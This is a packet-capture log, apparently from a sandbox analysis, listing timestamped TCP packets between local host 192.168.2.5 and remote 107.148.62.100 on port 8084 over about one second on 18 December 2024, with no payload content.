Dec 18, 2024 13:32:07.609435081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.609447002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.609484911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.615906000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.615917921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.615927935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.616015911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.617244005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.617259026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.617269039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.617336988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.618763924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.618812084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.619507074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.619522095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.619534969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.619568110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.621048927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.621062040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.621093035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.622613907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.622627974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.622638941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.622657061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.622677088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.624150991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.624166012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.624177933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.624228954 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.625684023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.625699043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.625711918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.625746012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.625771046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.635286093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.635299921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.635385036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.637146950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.637160063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.637208939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.638580084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.638593912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.638612032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.638642073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.640013933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.640028000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.640038967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.640069962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.640093088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.641268969 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.641283035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.641294956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.641331911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.642749071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.642761946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.642772913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.642792940 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.642815113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.644237995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.644253016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.644263983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.644315958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.645742893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.645755053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.645802021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.647305012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.647324085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.647336006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.647341967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.647373915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.648864031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.648878098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.648888111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.648926973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.650405884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.650419950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.650430918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.650450945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.650485039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.651935101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.651947975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.651957989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.651998997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.653466940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.653480053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.653491020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.653508902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.653531075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.701323986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.701752901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.701805115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.702253103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.703079939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.703135014 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.704442024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.705207109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.705260992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.705446959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.706104994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.706146002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.706800938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.708520889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.708565950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.709255934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.709268093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.709307909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.710580111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.711268902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.711318016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.712081909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.712570906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.712743998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.713082075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.713709116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.713747978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.725856066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.726411104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.727061987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.727114916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.793236017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.793916941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.793930054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.794209003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.794939995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.795675039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.795722961 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.796442032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.800174952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.807270050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.807746887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.807802916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.808351040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.808624983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.808682919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.809421062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.810022116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.810239077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.811871052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.812578917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.813070059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.813118935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.813781977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.814110994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.814161062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.814657927 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.814702034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.817080975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.818485975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.818550110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.819243908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.819375992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.819426060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.820069075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.820822954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.821935892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.821990967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.822376966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.823064089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.823123932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.828219891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.828469038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.828536034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.829107046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.829154968 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.830940962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.831665039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.831727028 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.832220078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.835660934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.835676908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.835724115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.837347984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.839576006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.915513992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.916099072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.916212082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.916810036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.916824102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.916995049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.917821884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.918428898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.920175076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.920223951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.920238018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.920279026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.921565056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.921983004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.922590017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.922655106 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.923264027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.923707008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.924894094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.924907923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.924952030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.926274061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.926620007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.926671982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.927200079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.928168058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.929693937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.929750919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.939870119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.940215111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.940323114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.940555096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.940658092 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.941306114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.986634970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.006932020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.007342100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.007432938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.007956028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.008313894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.008853912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.008884907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.008897066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.008940935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.009807110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.021315098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.021374941 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.021620989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.022301912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.022353888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.022607088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.023403883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.023451090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.023947954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.025458097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.025506973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.025691986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.026390076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.026444912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.027754068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.028135061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.028198004 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.028789997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.031038046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.031140089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.031447887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.031991005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.032041073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.032763958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.033124924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.033174038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.033821106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.036087036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.036137104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.036374092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.036907911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.036955118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.040973902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.041287899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.041337013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.041904926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.042939901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.042984009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.043267965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.043700933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.043754101 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.049231052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.049499989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.049557924 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.050043106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.109924078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.129471064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.129774094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.129988909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.130125999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.130434036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.130517960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.131098032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.131469965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.131520987 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.133178949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.133517981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.133563995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.133980036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.143650055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.143697023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.143910885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.144416094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.144428968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.144468069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.145512104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.145569086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.146063089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.146636963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.146646976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.146692038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.154125929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.154438019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.154489040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.154944897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.156168938 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.221647978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.221837997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.221926928 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.222477913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.222584963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.222646952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.223419905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.223568916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.223579884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.223640919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.235558033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.235791922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.235848904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.236289978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.236354113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.237068892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.237343073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.237402916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.238024950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.239530087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.239592075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.239806890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.240339994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.240402937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.242111921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.242398024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.242453098 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.243051052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.244894028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.245218992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.245311975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.245696068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.246206045 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.247301102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.247533083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.247592926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:08.248081923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.250746965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:08.250797987 CET	49705	8084	192.168.2.5	107.148.62.100
